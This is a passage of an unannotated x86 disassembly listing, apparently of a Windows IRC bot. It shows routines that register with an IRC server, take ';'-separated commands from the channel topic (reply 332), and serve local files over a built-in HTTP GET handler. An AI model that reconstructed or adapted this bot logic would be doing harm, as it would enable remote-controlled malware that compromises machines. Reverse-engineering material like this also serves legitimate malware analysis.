test cl, cl
jnz short loc_417D00
sub eax, esi
mov [ebp+eax+var_62C], cl
lea eax, [ebp+var_1072C]
push offset asc_4202A4 ; "!"
push eax
call sub_403A34
push eax
push offset aS_1 ; "%s"
lea eax, [ebp+var_78]
push 22h
push eax
call sub_402AEE
lea eax, [ebp+var_78]
add esp, 18h
lea esi, [eax+1]
loc_417D3B: ; CODE XREF: sub_41783D+503�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_417D3B
sub eax, esi
mov [ebp+eax+var_78], cl
lea eax, [ebp+var_78]
lea esi, [eax+1]
loc_417D4E: ; CODE XREF: sub_41783D+516�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_417D4E
sub eax, esi
push eax
lea eax, [ebp+var_77]
push eax
lea eax, [ebp+var_78]
push eax
call sub_403910
add esp, 0Ch
push 4
mov edi, offset a332_0 ; "332"
lea esi, [ebp+var_1062C]
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_417DB4
lea eax, [ebp+var_1042C]
push eax
push offset aS_2 ; "%s"
lea eax, [ebp+var_1AC]
push ebx
push eax
call sub_402AEE
lea eax, [ebp+var_1AC]
add esp, 10h
lea edx, [eax+1]
loc_417DA1: ; CODE XREF: sub_41783D+569�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_417DA1
mov byte ptr [ebp+var_10730], 1
jmp loc_417E41
; ---------------------------------------------------------------------------
loc_417DB4: ; CODE XREF: sub_41783D+53D�j
mov esi, [ebp+var_10734]
add esi, 5
lea eax, [ebp+var_1052C]
loc_417DC3: ; CODE XREF: sub_41783D+59E�j
mov cl, [eax]
cmp cl, [esi]
jnz short loc_417DE1
test cl, cl
jz short loc_417DDD
mov cl, [eax+1]
cmp cl, [esi+1]
jnz short loc_417DE1
inc eax
inc eax
inc esi
inc esi
test cl, cl
jnz short loc_417DC3
loc_417DDD: ; CODE XREF: sub_41783D+58E�j
xor eax, eax
jmp short loc_417DE6
; ---------------------------------------------------------------------------
loc_417DE1: ; CODE XREF: sub_41783D+58A�j
; sub_41783D+596�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_417DE6: ; CODE XREF: sub_41783D+5A2�j
test eax, eax
jnz short loc_417E15
lea eax, [ebp+var_78]
push eax
push offset aS_3 ; "%s"
lea eax, [ebp+var_1AC]
push ebx
push eax
call sub_402AEE
lea eax, [ebp+var_1AC]
add esp, 10h
lea edx, [eax+1]
loc_417E0C: ; CODE XREF: sub_41783D+5D4�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_417E0C
jmp short loc_417E41
; ---------------------------------------------------------------------------
loc_417E15: ; CODE XREF: sub_41783D+5AB�j
lea eax, [ebp+var_1052C]
push eax
push offset aS_4 ; "%s"
lea eax, [ebp+var_1AC]
push ebx
push eax
call sub_402AEE
lea eax, [ebp+var_1AC]
add esp, 10h
lea edx, [eax+1]
loc_417E3A: ; CODE XREF: sub_41783D+602�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_417E3A
loc_417E41: ; CODE XREF: sub_41783D+572�j
; sub_41783D+5D6�j
sub eax, edx
push 100h
lea esi, [ebp+var_72C]
mov ebx, offset byte_425021
mov [ebp+eax+var_1AC], 0
call sub_4196D1
pop ecx
lea eax, [ebp+var_62C]
mov ecx, esi
call sub_419044
test eax, eax
jnz short loc_417E7A
cmp byte ptr [ebp+var_10730], al
jz short loc_417EEE
loc_417E7A: ; CODE XREF: sub_41783D+633�j
xor edi, edi
cmp byte ptr [ebp+var_10730], 0
lea eax, [ebp+var_52C]
jz short loc_417E92
push offset asc_4202BC ; ";"
jmp short loc_417E97
; ---------------------------------------------------------------------------
loc_417E92: ; CODE XREF: sub_41783D+64C�j
push offset asc_4202C0 ; ";"
loc_417E97: ; CODE XREF: sub_41783D+653�j
push eax
call sub_403A34
jmp short loc_417EB3
; ---------------------------------------------------------------------------
loc_417E9F: ; CODE XREF: sub_41783D+67A�j
push offset asc_4202C4 ; ";"
push 0
mov [ebp+edi*4+var_10F34], eax
call sub_403A34
inc edi
loc_417EB3: ; CODE XREF: sub_41783D+660�j
test eax, eax
pop ecx
pop ecx
jnz short loc_417E9F
xor esi, esi
test edi, edi
jle short loc_417EEE
loc_417EBF: ; CODE XREF: sub_41783D+6AF�j
push [ebp+esi*4+var_10F34]
lea eax, [ebp+var_1AC]
push eax
lea eax, [ebp+var_62C]
push eax
lea eax, [ebp+var_78]
push eax
push [ebp+var_10730]
push [ebp+var_10734]
call sub_417676
inc esi
cmp esi, edi
jl short loc_417EBF
loc_417EEE: ; CODE XREF: sub_41783D+2E1�j
; sub_41783D+32D�j ...
mov al, 1
loc_417EF0: ; CODE XREF: sub_41783D+25D�j
mov ecx, [ebp+var_8]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402710
leave
retn 4
sub_41783D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417F01 proc near ; CODE XREF: seg000:0041C039�p
var_20414 = dword ptr -20414h
var_20410 = dword ptr -20410h
var_2040C = dword ptr -2040Ch
var_20408 = byte ptr -20408h
var_408 = byte ptr -408h
var_407 = byte ptr -407h
var_4 = dword ptr -4
push ebp
mov ebp, esp
mov eax, 20414h
call sub_411400
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+var_4], eax
push ebx
push esi
push edi
mov esi, 3FFh
xor ebx, ebx
push esi
lea eax, [ebp+var_407]
mov edi, ecx
push ebx
push eax
mov [ebp+var_20414], edi
mov [ebp+var_408], bl
call sub_407B70
add esp, 0Ch
push ebx
push esi
lea eax, [ebp+var_408]
push eax
push dword ptr [edi]
mov [ebp+var_2040C], ebx
call ds:dword_41D270
test eax, eax
jz loc_418016
lea eax, [ebp+var_408]
lea edx, [eax+1]
loc_417F69: ; CODE XREF: sub_417F01+6D�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_417F69
sub eax, edx
mov [ebp+eax+var_408], bl
lea eax, [ebp+var_408]
push offset asc_420238 ; "\r\n"
push eax
call sub_403A34
push 20000h
mov edi, eax
lea eax, [ebp+var_20408]
push ebx
push eax
call sub_407B70
add esp, 14h
cmp edi, ebx
mov esi, 200h
jz short loc_417FEC
lea eax, [ebp+var_20408]
mov [ebp+var_20410], eax
loc_417FB6: ; CODE XREF: sub_417F01+E9�j
push edi
push offset aS_10 ; "%s"
push 1FFh
push [ebp+var_20410]
call sub_402AEE
push offset asc_420240 ; "\r\n"
push ebx
call sub_403A34
add [ebp+var_20410], esi
add esp, 18h
inc [ebp+var_2040C]
mov edi, eax
cmp edi, ebx
jnz short loc_417FB6
loc_417FEC: ; CODE XREF: sub_417F01+A7�j
cmp [ebp+var_2040C], ebx
jle short loc_418012
mov ebx, [ebp+var_2040C]
lea edi, [ebp+var_20408]
loc_418000: ; CODE XREF: sub_417F01+10F�j
push [ebp+var_20414]
mov ecx, edi
call sub_41783D
add edi, esi
dec ebx
jnz short loc_418000
loc_418012: ; CODE XREF: sub_417F01+F1�j
mov al, 1
jmp short loc_418020
; ---------------------------------------------------------------------------
loc_418016: ; CODE XREF: sub_417F01+59�j
push dword ptr [edi]
call ds:dword_41D224
xor al, al
loc_418020: ; CODE XREF: sub_417F01+113�j
mov ecx, [ebp+var_4]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402710
leave
retn
sub_417F01 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41802F proc near ; CODE XREF: seg000:0041C027�p
var_450 = dword ptr -450h
var_44C = dword ptr -44Ch
var_448 = byte ptr -448h
var_447 = byte ptr -447h
var_444 = byte ptr -444h
var_443 = byte ptr -443h
var_440 = word ptr -440h
var_43E = word ptr -43Eh
var_43C = byte ptr -43Ch
var_430 = byte ptr -430h
var_42F = byte ptr -42Fh
var_230 = byte ptr -230h
var_22F = byte ptr -22Fh
var_30 = byte ptr -30h
var_2F = byte ptr -2Fh
var_24 = byte ptr -24h
var_23 = byte ptr -23h
var_18 = byte ptr -18h
var_17 = byte ptr -17h
var_C = byte ptr -0Ch
var_B = byte ptr -0Bh
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 454h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 0
push 1
mov edi, ecx
push 2
mov [ebp+var_450], edi
mov ebx, edx
mov [ebp+var_44C], eax
call ds:dword_41D27C
cmp eax, 0FFFFFFFFh
mov [edi], eax
jnz short loc_418079
push eax
loc_41806C: ; CODE XREF: sub_41802F+8B�j
call ds:dword_41D224
xor al, al
jmp loc_41828B
; ---------------------------------------------------------------------------
loc_418079: ; CODE XREF: sub_41802F+3A�j
push 1FFh
lea eax, [ebp+var_22F]
push 0
push eax
mov [ebp+var_230], 0
call sub_407B70
add esp, 0Ch
push 200h
lea esi, [ebp+var_230]
call sub_4196D1
pop ecx
mov eax, esi
push eax
call ds:dword_41D23C
mov esi, eax
xor ebx, ebx
cmp esi, ebx
jnz short loc_4180BC
loc_4180B8: ; CODE XREF: sub_41802F+E7�j
push dword ptr [edi]
jmp short loc_41806C
; ---------------------------------------------------------------------------
loc_4180BC: ; CODE XREF: sub_41802F+87�j
push 200h
lea eax, [ebp+var_230]
push ebx
push eax
call sub_407B70
movsx eax, word ptr [esi+0Ah]
add esp, 0Ch
push eax
mov eax, [esi+0Ch]
push dword ptr [eax]
lea eax, [ebp+var_43C]
push eax
call sub_407BF0
add esp, 0Ch
push [ebp+arg_4]
mov [ebp+var_440], 2
call ds:dword_41D278
mov [ebp+var_43E], ax
push 10h
lea eax, [ebp+var_440]
push eax
push dword ptr [edi]
call ds:dword_41D240
test eax, eax
jnz short loc_4180B8
mov eax, [ebp+var_44C]
lea edx, [eax+1]
loc_418121: ; CODE XREF: sub_41802F+F7�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_418121
sub eax, edx
jz short loc_418197
xor eax, eax
mov [ebp+var_18], bl
lea edi, [ebp+var_17]
stosd
push 1FFh
stosd
lea eax, [ebp+var_42F]
push ebx
push eax
mov [ebp+var_430], bl
call sub_407B70
mov ebx, [ebp+var_44C]
add esp, 0Ch
push 200h
lea esi, [ebp+var_430]
call sub_4196D1
pop ecx
push 9
lea esi, [ebp+var_18]
mov ebx, offset byte_425531
call sub_4196D1
mov edi, [ebp+var_450]
pop ecx
lea eax, [ebp+var_430]
push eax
mov eax, esi
push eax
push offset aSS_7 ; "%s %s\r\n"
call sub_4172CC
add esp, 0Ch
xor ebx, ebx
loc_418197: ; CODE XREF: sub_41802F+FB�j
xor eax, eax
mov [ebp+var_24], bl
lea edi, [ebp+var_23]
stosd
stosd
xor eax, eax
mov [ebp+var_30], bl
lea edi, [ebp+var_2F]
stosd
stosd
xor eax, eax
mov [ebp+var_C], bl
lea edi, [ebp+var_B]
stosd
stosw
xor eax, eax
push ebx
mov [ebp+var_448], bl
lea edi, [ebp+var_447]
stosw
push 3
mov [ebp+var_444], bl
lea edi, [ebp+var_443]
pop ecx
lea esi, [ebp+var_448]
stosw
call sub_418E51
pop ecx
push ebx
push 3
lea esi, [ebp+var_444]
call sub_418E1F
xor eax, eax
lea edi, [ebp+var_C]
stosd
stosw
stosb
mov eax, esi
push eax
lea eax, [ebp+var_448]
push eax
push offset aSS_8 ; "%s-%s"
lea eax, [ebp+var_C]
push 6
push eax
call sub_402AEE
lea eax, [ebp+var_C]
add esp, 1Ch
lea esi, [eax+1]
loc_41821E: ; CODE XREF: sub_41802F+1F4�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_41821E
sub eax, esi
mov [ebp+eax+var_C], bl
xor eax, eax
lea edi, [ebp+var_448]
stosw
stosb
xor eax, eax
lea edi, [ebp+var_444]
stosw
push 9
lea esi, [ebp+var_24]
mov ebx, offset dword_425528
stosb
call sub_4196D1
pop ecx
push 9
lea esi, [ebp+var_30]
mov ebx, offset word_42553A
call sub_4196D1
mov edi, [ebp+var_450]
pop ecx
lea ebx, [edi+5]
call sub_41748B
push ebx
lea eax, [ebp+var_C]
push eax
mov eax, esi
push eax
push ebx
lea eax, [ebp+var_24]
push eax
push offset aSSSS00S ; "%s %s\r\n%s %s 0 0 :%s\r\n"
call sub_4172CC
add esp, 18h
mov al, 1
loc_41828B: ; CODE XREF: sub_41802F+45�j
mov ecx, [ebp+var_4]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402710
leave
retn 8
sub_41802F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41829C proc near ; CODE XREF: sub_418301+3E�p
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_B = byte ptr -0Bh
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov [ebp+var_10], eax
xor eax, eax
mov [ebp+var_C], 0
lea edi, [ebp+var_B]
push 5
lea esi, [ebp+var_C]
mov ebx, offset dword_425528
stosd
call sub_4196D1
mov ebx, [ebp+var_10]
pop ecx
add ebx, 5
call sub_41748B
push ebx
mov eax, esi
push eax
push offset aSS_6 ; "%s %s\r\n"
mov edi, offset dword_4269BC
call sub_4172CC
mov ecx, [ebp+var_4]
add esp, 0Ch
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402710
leave
retn 4
sub_41829C endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_418301 proc near ; DATA XREF: seg000:0041BF7C�o
push ebp
mov ebp, esp
and esp, 0FFFFFFF8h
push esi
push edi
call sub_418DA0
mov edi, ds:dword_426598
mov esi, ds:dword_42659C
loc_41831A: ; CODE XREF: sub_418301+5A�j
call sub_418DA0
cmp ds:dword_42659C, esi
jl short loc_418344
jg short loc_418331
cmp ds:dword_426598, edi
jbe short loc_418344
loc_418331: ; CODE XREF: sub_418301+26�j
cmp ds:byte_4269C0, 0
jz short loc_418344
push offset dword_4269BC
call sub_41829C
loc_418344: ; CODE XREF: sub_418301+24�j
; sub_418301+2E�j ...
mov edi, ds:dword_426598
mov esi, ds:dword_42659C
push 0C350h
call ds:dword_41D0FC
jmp short loc_41831A
sub_418301 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41835D proc near ; CODE XREF: sub_418AEB+1E�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
lea eax, [ebp+var_4]
push eax
push offset word_426694
push ds:dword_4267AC
mov [ebp+var_4], 10h
call ds:dword_41D234
leave
retn
sub_41835D endp
; =============== S U B R O U T I N E =======================================
sub_41837F proc near ; CODE XREF: sub_418552+1D2�p
arg_0 = dword ptr 4
jmp short loc_418384
; ---------------------------------------------------------------------------
loc_418381: ; CODE XREF: sub_41837F+14�j
mov byte ptr [eax], 5Ch
loc_418384: ; CODE XREF: sub_41837F�j
push 2Fh
push [esp+4+arg_0]
call sub_403850
test eax, eax
pop ecx
pop ecx
jnz short loc_418381
retn
sub_41837F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418396 proc near ; CODE XREF: sub_418552+192�p
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = byte ptr -4
var_2 = byte ptr -2
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
push esi
mov esi, [ebp+arg_0]
mov eax, esi
push edi
lea ecx, [eax+1]
loc_4183A7: ; CODE XREF: sub_418396+16�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_4183A7
sub eax, ecx
inc eax
push eax
call sub_402648
mov ebx, eax
push ebx
call sub_402A45
push eax
push 0
push ebx
call sub_407B70
push 25h
push esi
call sub_403850
add esp, 1Ch
test eax, eax
jnz short loc_418420
loc_4183D7: ; CODE XREF: sub_418396+114�j
mov eax, esi
mov edx, esi
loc_4183DB: ; CODE XREF: sub_418396+4A�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4183DB
mov edi, ebx
sub eax, edx
dec edi
loc_4183E7: ; CODE XREF: sub_418396+57�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_4183E7
mov ecx, eax
shr ecx, 2
mov esi, edx
mov edx, [ebp+arg_0]
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
xor eax, eax
mov edi, edx
stosd
mov eax, ebx
sub edx, ebx
loc_41840B: ; CODE XREF: sub_418396+7D�j
mov cl, [eax]
mov [edx+eax], cl
inc eax
test cl, cl
jnz short loc_41840B
xor esi, esi
inc esi
jmp loc_4184B1
; ---------------------------------------------------------------------------
loc_41841D: ; CODE XREF: sub_418396+10E�j
mov eax, [ebp+var_8]
loc_418420: ; CODE XREF: sub_418396+3F�j
mov byte ptr [eax], 0
mov ecx, esi
loc_418425: ; CODE XREF: sub_418396+94�j
mov dl, [ecx]
inc ecx
test dl, dl
jnz short loc_418425
sub ecx, esi
mov edi, ebx
mov edx, ecx
dec edi
loc_418433: ; CODE XREF: sub_418396+A3�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_418433
mov ecx, edx
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
inc eax
push 2
push eax
mov [ebp+var_8], eax
lea eax, [ebp+var_4]
push eax
rep movsb
call sub_403910
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_4]
push offset asc_4204B4 ; "%x"
push eax
mov [ebp+var_2], 0
call sub_4035E4
add esp, 18h
test eax, eax
jz short loc_4184AF
mov eax, ebx
lea esi, [eax+1]
loc_41847B: ; CODE XREF: sub_418396+EA�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_41847B
mov cl, [ebp+var_C]
sub eax, esi
mov esi, [ebp+var_8]
add esi, 2
push 25h
push esi
mov [eax+ebx], cl
mov byte ptr [eax+ebx+1], 0
call sub_403850
test eax, eax
pop ecx
pop ecx
mov [ebp+var_8], eax
jnz loc_41841D
jmp loc_4183D7
; ---------------------------------------------------------------------------
loc_4184AF: ; CODE XREF: sub_418396+DE�j
xor esi, esi
loc_4184B1: ; CODE XREF: sub_418396+82�j
push ebx
call sub_402B9B
pop ecx
pop edi
mov eax, esi
pop esi
pop ebx
leave
retn
sub_418396 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4184BF proc near ; CODE XREF: sub_418552+A1�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
mov [eax], esi
mov eax, [ebp+arg_4]
push edi
mov [eax], esi
mov eax, [ebp+arg_8]
push offset asc_42049C ; "\r\n"
push esi
mov [ebx], esi
mov [eax], esi
call sub_4037B0
mov edi, eax
test edi, edi
pop ecx
pop ecx
jnz short loc_4184EB
loc_4184E7: ; CODE XREF: sub_4184BF+52�j
; sub_4184BF+69�j ...
xor eax, eax
jmp short loc_41854F
; ---------------------------------------------------------------------------
loc_4184EB: ; CODE XREF: sub_4184BF+26�j
push offset asc_4204A0 ; " "
push esi
mov byte ptr [edi], 0
call sub_403A34
mov ecx, [ebp+arg_0]
push offset asc_4204A4 ; " "
push 0
mov [ecx], eax
call sub_403A34
add esp, 10h
test eax, eax
mov [ebx], eax
jz short loc_4184E7
push offset asc_4204A8 ; " "
push 0
call sub_403A34
test eax, eax
pop ecx
pop ecx
mov ecx, [ebp+arg_4]
mov [ecx], eax
jz short loc_4184E7
mov ecx, [ebp+arg_8]
lea eax, [edi+2]
cmp byte ptr [eax], 0
mov [ecx], eax
jz short loc_41854C
push offset asc_4204AC ; "\r\n\r\n"
push eax
call sub_4037B0
test eax, eax
pop ecx
pop ecx
jz short loc_4184E7
mov byte ptr [eax+2], 0
loc_41854C: ; CODE XREF: sub_4184BF+76�j
xor eax, eax
inc eax
loc_41854F: ; CODE XREF: sub_4184BF+2A�j
pop edi
pop ebp
retn
sub_4184BF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=0CA8h
sub_418552 proc near ; CODE XREF: sub_418AEB+28�p
var_D28 = dword ptr -0D28h
var_D24 = dword ptr -0D24h
var_D20 = dword ptr -0D20h
var_D1C = dword ptr -0D1Ch
var_D18 = byte ptr -0D18h
var_D14 = byte ptr -0D14h
var_D13 = byte ptr -0D13h
var_D12 = byte ptr -0D12h
var_D11 = byte ptr -0D11h
var_D08 = byte ptr -0D08h
var_D07 = byte ptr -0D07h
var_908 = byte ptr -908h
var_907 = byte ptr -907h
var_508 = byte ptr -508h
var_507 = byte ptr -507h
var_108 = byte ptr -108h
var_107 = byte ptr -107h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-0CA8h]
sub esp, 0D28h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+0CA8h+var_4], eax
push ebx
push esi
mov esi, 3FFh
xor ebx, ebx
push esi
lea eax, [ebp+0CA8h+var_907]
push ebx
push eax
mov [ebp+0CA8h+var_908], bl
call sub_407B70
push esi
lea eax, [ebp+0CA8h+var_507]
push ebx
push eax
mov [ebp+0CA8h+var_508], bl
call sub_407B70
push 103h
lea eax, [ebp+0CA8h+var_107]
push ebx
push eax
mov [ebp+0CA8h+var_108], bl
call sub_407B70
push esi
lea eax, [ebp+0CA8h+var_D07]
push ebx
push eax
mov [ebp+0CA8h+var_D08], bl
call sub_407B70
add esp, 30h
push ebx
push 400h
lea eax, [ebp+0CA8h+var_D08]
push eax
push [ebp+0CA8h+arg_0]
call ds:dword_41D270
mov [ebp+eax+0CA8h+var_D08], bl
lea eax, [ebp+0CA8h+var_D1C]
push eax
lea eax, [ebp+0CA8h+var_D20]
push eax
lea eax, [ebp+0CA8h+var_D28]
push eax
lea ebx, [ebp+0CA8h+var_D24]
lea esi, [ebp+0CA8h+var_D08]
call sub_4184BF
add esp, 0Ch
test eax, eax
jz loc_418AD4
mov esi, [ebp+0CA8h+var_D28]
push edi
push 4
mov edi, offset aGet ; "GET"
pop ecx
xor eax, eax
repe cmpsb
jz loc_4186E0
push offset aQue?_1 ; "Que?"
mov esi, 3FFh
lea eax, [ebp+0CA8h+var_908]
push esi
push eax
call sub_402AEE
lea eax, [ebp+0CA8h+var_908]
add esp, 0Ch
lea edx, [eax+1]
loc_41863C: ; CODE XREF: sub_418552+EF�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_41863C
sub eax, edx
xor ebx, ebx
mov [ebp+eax+0CA8h+var_908], bl
lea eax, [ebp+0CA8h+var_908]
lea ecx, [eax+1]
loc_418657: ; CODE XREF: sub_418552+10A�j
mov dl, [eax]
inc eax
cmp dl, bl
jnz short loc_418657
sub eax, ecx
push eax
push offset aHttp1_1501NotI ; "HTTP/1.1 501 Not Implemented\r\nContent-L"...
lea eax, [ebp+0CA8h+var_508]
push esi
push eax
call sub_402AEE
lea eax, [ebp+0CA8h+var_508]
add esp, 10h
lea ecx, [eax+1]
loc_41867F: ; CODE XREF: sub_418552+132�j
mov dl, [eax]
inc eax
cmp dl, bl
jnz short loc_41867F
sub eax, ecx
mov [ebp+eax+0CA8h+var_508], bl
lea eax, [ebp+0CA8h+var_508]
lea ecx, [eax+1]
loc_418698: ; CODE XREF: sub_418552+14B�j
mov dl, [eax]
inc eax
cmp dl, bl
jnz short loc_418698
mov esi, ds:dword_41D228
push ebx
sub eax, ecx
push eax
lea eax, [ebp+0CA8h+var_508]
push eax
push [ebp+0CA8h+arg_0]
call esi
lea eax, [ebp+0CA8h+var_908]
lea ecx, [eax+1]
loc_4186C1: ; CODE XREF: sub_418552+174�j
mov dl, [eax]
inc eax
cmp dl, bl
jnz short loc_4186C1
push ebx
sub eax, ecx
push eax
lea eax, [ebp+0CA8h+var_908]
push eax
push [ebp+0CA8h+arg_0]
call esi
jmp loc_418AC7
; ---------------------------------------------------------------------------
loc_4186E0: ; CODE XREF: sub_418552+C1�j
mov edi, [ebp+0CA8h+var_D24]
push edi
call sub_418396
test eax, eax
pop ecx
jz loc_418AD3
mov eax, edi
lea edx, [eax+1]
loc_4186F7: ; CODE XREF: sub_418552+1AA�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4186F7
sub eax, edx
cmp eax, 1
jbe loc_418849
inc edi
push 2Fh
push edi
call sub_403850
mov esi, eax
xor ebx, ebx
cmp esi, ebx
pop ecx
pop ecx
jz loc_4187A6
mov [esi], bl
inc esi
push esi
call sub_41837F
push ebx
push esi
call sub_403850
add esp, 0Ch
cmp [esi], bl
jz short loc_41876F
cmp byte ptr [eax-1], 5Ch
jz short loc_41876F
push esi
push edi
push offset dword_4266A8
push offset aSSS ; "%s\\%s\\%s"
lea eax, [ebp+0CA8h+var_108]
push 103h
push eax
call sub_402AEE
lea eax, [ebp+0CA8h+var_108]
add esp, 18h
lea esi, [eax+1]
loc_418766: ; CODE XREF: sub_418552+219�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_418766
jmp short loc_4187D5
; ---------------------------------------------------------------------------
loc_41876F: ; CODE XREF: sub_418552+1E3�j
; sub_418552+1E9�j
push offset dword_4268B8
push esi
push edi
push offset dword_4266A8
push offset aSSSS ; "%s\\%s\\%s%s"
lea eax, [ebp+0CA8h+var_108]
push 103h
push eax
call sub_402AEE
lea eax, [ebp+0CA8h+var_108]
add esp, 1Ch
lea esi, [eax+1]
loc_41879D: ; CODE XREF: sub_418552+250�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_41879D
jmp short loc_4187D5
; ---------------------------------------------------------------------------
loc_4187A6: ; CODE XREF: sub_418552+1C8�j
push edi
push offset dword_4266A8
push offset aSS_4 ; "%s\\%s"
lea eax, [ebp+0CA8h+var_108]
push 103h
push eax
call sub_402AEE
lea eax, [ebp+0CA8h+var_108]
add esp, 14h
lea esi, [eax+1]
loc_4187CE: ; CODE XREF: sub_418552+281�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_4187CE
loc_4187D5: ; CODE XREF: sub_418552+21B�j
; sub_418552+252�j
sub eax, esi
mov [ebp+eax+0CA8h+var_108], bl
lea eax, [ebp+0CA8h+var_108]
push eax
push offset byte_4267B0
call sub_4028A9
test eax, eax
pop ecx
pop ecx
jz short loc_41884B
mov esi, 200h
push esi
call sub_4036E0
push esi
mov edi, eax
push ebx
push edi
mov [ebp+0CA8h+var_D20], edi
call sub_407B70
add esp, 10h
push offset aQue?_0 ; "Que?"
push edi
call sub_402A45
pop ecx
dec eax
push eax
push edi
call sub_402AEE
mov eax, edi
add esp, 0Ch
lea esi, [eax+1]
loc_41882C: ; CODE XREF: sub_418552+2DF�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_41882C
sub eax, esi
mov [eax+edi], bl
mov eax, edi
lea esi, [eax+1]
loc_41883D: ; CODE XREF: sub_418552+2F0�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_41883D
jmp loc_41892E
; ---------------------------------------------------------------------------
loc_418849: ; CODE XREF: sub_418552+1B1�j
xor ebx, ebx
loc_41884B: ; CODE XREF: sub_418552+2A1�j
push ebx
push ebx
push 3
push ebx
push 1
push 80000000h
lea eax, [ebp+0CA8h+var_108]
push eax
call ds:dword_41D06C
mov esi, eax
cmp esi, 0FFFFFFFFh
mov [ebp+0CA8h+var_D24], esi
jz short loc_4188DF
push ebx
push esi
call ds:dword_41D070
mov edi, eax
push edi
mov [ebp+0CA8h+var_D1C], edi
call sub_4036E0
push edi
push ebx
push eax
mov [ebp+0CA8h+var_D20], eax
call sub_407B70
add esp, 10h
push ebx
push ebx
push ebx
push esi
mov esi, ds:dword_41D074
call esi
push ebx
lea eax, [ebp+0CA8h+var_D28]
push eax
push edi
mov edi, ds:dword_41D078
jmp short loc_4188D1
; ---------------------------------------------------------------------------
loc_4188A9: ; CODE XREF: sub_418552+389�j
cmp [ebp+0CA8h+var_D28], ebx
jnz loc_418933
push [ebp+0CA8h+var_D1C]
push ebx
push [ebp+0CA8h+var_D20]
call sub_407B70
add esp, 0Ch
push ebx
push ebx
push ebx
push [ebp+0CA8h+var_D24]
call esi
push ebx
lea eax, [ebp+0CA8h+var_D28]
push eax
push [ebp+0CA8h+var_D1C]
loc_4188D1: ; CODE XREF: sub_418552+355�j
push [ebp+0CA8h+var_D20]
push [ebp+0CA8h+var_D24]
call edi
test eax, eax
jnz short loc_4188A9
jmp short loc_418933
; ---------------------------------------------------------------------------
loc_4188DF: ; CODE XREF: sub_418552+31A�j
mov esi, 200h
push esi
call sub_4036E0
push esi
mov edi, eax
push ebx
push edi
mov [ebp+0CA8h+var_D20], edi
call sub_407B70
add esp, 10h
push offset aQue? ; "Que?"
push edi
call sub_402A45
pop ecx
dec eax
push eax
push edi
call sub_402AEE
mov eax, edi
add esp, 0Ch
lea esi, [eax+1]
loc_418916: ; CODE XREF: sub_418552+3C9�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_418916
sub eax, esi
mov [eax+edi], bl
mov eax, edi
lea esi, [eax+1]
loc_418927: ; CODE XREF: sub_418552+3DA�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_418927
loc_41892E: ; CODE XREF: sub_418552+2F2�j
sub eax, esi
mov [ebp+0CA8h+var_D1C], eax
loc_418933: ; CODE XREF: sub_418552+35A�j
; sub_418552+38B�j
push 400h
lea eax, [ebp+0CA8h+var_508]
push ebx
push eax
call sub_407B70
push [ebp+0CA8h+var_D1C]
lea eax, [ebp+0CA8h+var_508]
push offset aHttp1_1200OkCo ; "HTTP/1.1 200 ok\r\nContent-Length: %d\r\nCo"...
push 3FFh
push eax
call sub_402AEE
lea eax, [ebp+0CA8h+var_508]
add esp, 1Ch
lea esi, [eax+1]
loc_41896A: ; CODE XREF: sub_418552+41D�j
mov cl, [eax]
inc eax
cmp cl, bl
